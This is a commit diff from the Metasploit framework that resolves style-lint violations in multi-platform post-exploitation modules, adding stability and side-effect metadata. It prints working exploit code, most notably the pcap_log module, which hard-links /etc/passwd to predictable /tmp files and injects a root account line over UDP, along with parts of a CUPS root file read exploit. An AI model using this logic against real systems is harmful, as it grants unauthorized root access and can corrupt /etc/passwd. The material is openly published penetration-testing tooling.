modules/post/multi: Resolve RuboCop violations

Author: bcoles

modules/post/multi/escalate/aws_create_iam_user.rb

@@ -27,7 +27,12 @@ def initialize(info = {})
         ],
         'References' => [
           [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
-        ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

modules/post/multi/escalate/cups_root_file_read.rb

@@ -14,34 +14,37 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        {
-          'Name' => 'CUPS 1.6.1 Root File Read',
-          'Description' => %q{
-            This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.
-            CUPS allows members of the lpadmin group to make changes to the cupsd.conf
-            configuration, which can specify an Error Log path. When the user visits the
-            Error Log page in the web interface, the cupsd daemon (running with setuid root)
-            reads the Error Log path and echoes it as plaintext.
-
-            This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4
-            as long as the session is in the lpadmin group.
-
-            Warning: if the user has set up a custom path to the CUPS error log,
-            this module might fail to reset that path correctly. You can specify
-            a custom error log path with the ERROR_LOG datastore option.
-          },
-          'References' => [
-            ['CVE', '2012-5519'],
-            ['OSVDB', '87635'],
-            ['URL', 'http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791']
-          ],
-          'License' => MSF_LICENSE,
-          'Author' => [
-            'Jann Horn', # discovery
-            'joev' # metasploit module
-          ],
-          'DisclosureDate' => '2012-11-20',
-          'Platform' => %w[linux osx]
+        'Name' => 'CUPS 1.6.1 Root File Read',
+        'Description' => %q{
+          This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.
+          CUPS allows members of the lpadmin group to make changes to the cupsd.conf
+          configuration, which can specify an Error Log path. When the user visits the
+          Error Log page in the web interface, the cupsd daemon (running with setuid root)
+          reads the Error Log path and echoes it as plaintext.
+
+          This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4
+          as long as the session is in the lpadmin group.
+
+          Warning: if the user has set up a custom path to the CUPS error log,
+          this module might fail to reset that path correctly. You can specify
+          a custom error log path with the ERROR_LOG datastore option.
+        },
+        'References' => [
+          ['CVE', '2012-5519'],
+          ['OSVDB', '87635'],
+          ['URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791']
+        ],
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jann Horn', # discovery
+          'joev' # metasploit module
+        ],
+        'DisclosureDate' => '2012-11-20',
+        'Platform' => %w[linux osx],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],
+          'Reliability' => []
         }
       )
     )
@@ -58,25 +61,25 @@ def check_exploitability
     if (user_groups & LP_GROUPS).empty?
       print_error 'User not in lpadmin group.'
       return Msf::Exploit::CheckCode::Safe
-    else
-      print_good 'User in lpadmin group, continuing...'
     end
 
+    print_good 'User in lpadmin group, continuing...'
+
     if ctl_path.blank?
       print_error 'cupsctl binary not found in $PATH'
       return Msf::Exploit::CheckCode::Safe
-    else
-      print_good 'cupsctl binary found in $PATH'
     end
 
+    print_good 'cupsctl binary found in $PATH'
+
     nc_path = whereis('nc')
     if nc_path.nil? || nc_path.blank?
       print_error 'Could not find nc executable'
       return Msf::Exploit::CheckCode::Unknown
-    else
-      print_good 'nc binary found in $PATH'
     end
 
+    print_good 'nc binary found in $PATH'
+
     config_path = whereis('cups-config')
     config_vn = nil
 
@@ -132,6 +135,7 @@ def cleanup
     print_status 'Cleaning up...'
     cmd_exec("#{ctl_path} WebInterface=no") if web_server_was_disabled
     cmd_exec("#{ctl_path} ErrorLog=#{prev_error_log_path}") if error_log_was_reset
+  ensure
     super
   end
 

modules/post/multi/escalate/metasploit_pcaplog.rb

@@ -14,31 +14,34 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        {
-          'Name'	=> 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
-          'Description' => %q{
-            Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
-            creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
-            filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
-            This, and all the other packets, are appended to /etc/passwd.
-
-            Successful exploitation results in the creation of a new superuser account.
-
-            This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
-            files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
-            a permanent DoS on the target by corrupting the /etc/passwd file.
-          },
-          'License' => MSF_LICENSE,
-          'Author'	=> [ '0a29406d9794e4f9b30b3c5d6702c708'],
-          'Platform' => %w[bsd linux unix],
-          'SessionTypes' => [ 'shell', 'meterpreter' ],
-          'References' => [
-            [ 'BID', '54472' ],
-            [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
-            [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
-          ],
-          'DisclosureDate' => '2012-07-16',
-          'Stance' => Msf::Exploit::Stance::Passive
+        'Name'	=> 'Multi Escalate Metasploit pcap_log Local Privilege Escalation',
+        'Description' => %q{
+          Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
+          creates pcap files in /tmp with predictable file names. This exploits this by hard-linking these
+          filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
+          This, and all the other packets, are appended to /etc/passwd.
+
+          Successful exploitation results in the creation of a new superuser account.
+
+          This module requires manual clean-up. Upon success, you should remove /tmp/msf3-session*pcap
+          files and truncate /etc/passwd. Note that if this module fails, you can potentially induce
+          a permanent DoS on the target by corrupting the /etc/passwd file.
+        },
+        'License' => MSF_LICENSE,
+        'Author'	=> [ '0a29406d9794e4f9b30b3c5d6702c708'],
+        'Platform' => %w[bsd linux unix],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'References' => [
+          [ 'BID', '54472' ],
+          [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
+          [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
+        ],
+        'DisclosureDate' => '2012-07-16',
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],
+          'Reliability' => []
         }
       )
     )
@@ -48,7 +51,7 @@ def initialize(info = {})
         OptString.new('USERNAME', [ true, 'Username for the new superuser', 'metasploit' ]),
         OptString.new('PASSWORD', [ true, 'Password for the new superuser', 'metasploit' ]),
         OptInt.new('MINUTES', [true, 'Number of minutes to try to inject', 5])
-      ], self
+      ]
     )
   end
 
@@ -59,13 +62,18 @@ def normalize_minutes
   end
 
   def run
-    print_status "Setting up the victim's /tmp dir"
     fail_with(Failure::NotFound, '/etc/passwd not found on system') unless file_exist?('/etc/passwd')
+
     initial_size = read_file('/etc/passwd').lines.count
-    print_status "/etc/passwd is currently #{initial_size} lines long"
+    print_status("/etc/passwd is currently #{initial_size} lines long")
+
+    print_status("Setting up the victim's /tmp dir")
+
+    username = datastore['USERNAME']
     i = 0
     j = 0
     loop do
+      # Setup links to /etc/passwd
       if (i == 0)
         j += 1
         break if j >= datastore['MINUTES'] + 1 # Give up after X minutes
@@ -74,29 +82,30 @@ def run
         print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
         cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
       end
+
       current_size = read_file('/etc/passwd').lines.count
-      if current_size == initial_size
-        # PCAP is flowing
-        pkt = "\n\n" + datastore['USERNAME'] + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
-        vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
-        udpsock = Rex::Socket::Udp.create(
-          {
-            'Context' => { 'Msf' => framework, 'MsfExploit' => self }
-          }
-        )
-        res = udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
-      else
-        break
-      end
+
+      # passwd file line count has changed
+      break if current_size != initial_size
+
+      # PCAP is flowing
+      pkt = "\n\n" + username + ':' + datastore['PASSWORD'].crypt('0a') + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
+      vprint_status("Sending /etc/passwd file contents payload to #{session.session_host}")
+      udpsock = Rex::Socket::Udp.create(
+        {
+          'Context' => { 'Msf' => framework, 'MsfExploit' => self }
+        }
+      )
+      udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
       sleep(1) # wait a second
       i = (i + 1) % 60 # increment second counter
     end
 
     if read_file('/etc/passwd').includes?('Metasploit')
-      print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
+      print_good("Success. You should now be able to login or su to the '#{username}' account")
       # TODO: Consider recording our now-created username and password as a valid credential here.
     else
-      print_error("Failed, the '" + datastore['USERNAME'] + "' user does not appear to have been added")
+      print_error("Failed, the '#{username}' user does not appear to have been added")
     end
     # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
     #	  However beceause the session is not a terminal, su will not always allow this.

modules/post/multi/general/close.rb

@@ -10,11 +10,16 @@ def initialize(info = {})
       update_info(
         info,
         'Name' => 'Multi Generic Operating System Session Close',
-        'Description' => %q{ This module closes the specified session. This can be useful as a finisher for automation tasks },
+        'Description' => %q{This module closes the specified session. This can be useful as a finisher for automation tasks.},
         'License' => MSF_LICENSE,
         'Author' => [ 'hdm' ],
         'Platform' => %w[linux osx unix win],
-        'SessionTypes' => [ 'shell', 'meterpreter' ]
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end

modules/post/multi/general/execute.rb

@@ -14,7 +14,12 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Author' => [ 'hdm' ],
         'Platform' => %w[linux osx unix win],
-        'SessionTypes' => [ 'shell', 'meterpreter' ]
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
     register_options(

modules/post/multi/general/wall.rb

@@ -19,15 +19,20 @@ def initialize(info = {})
         ],
         # TODO: is there a way to do this on Windows?
         'Platform' => %w[linux osx unix],
-        'SessionTypes' => %w[shell meterpreter]
+        'SessionTypes' => %w[shell meterpreter],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [SCREEN_EFFECTS],
+          'Reliability' => []
+        }
       )
     )
     register_options(
       [
         OptString.new('MESSAGE', [false, 'The message to send', '']),
         OptString.new('USERS', [
-          false, 'List of users to write(1) to, separated by commas. ' \
-                      ' wall(1)s to all users by default'
+          false,
+          'List of users to write(1) to, separated by commas. wall(1)s to all users by default.'
         ]),
         OptBool.new('COWSAY', [true, 'Display MESSAGE in a ~cowsay way', false])
       ]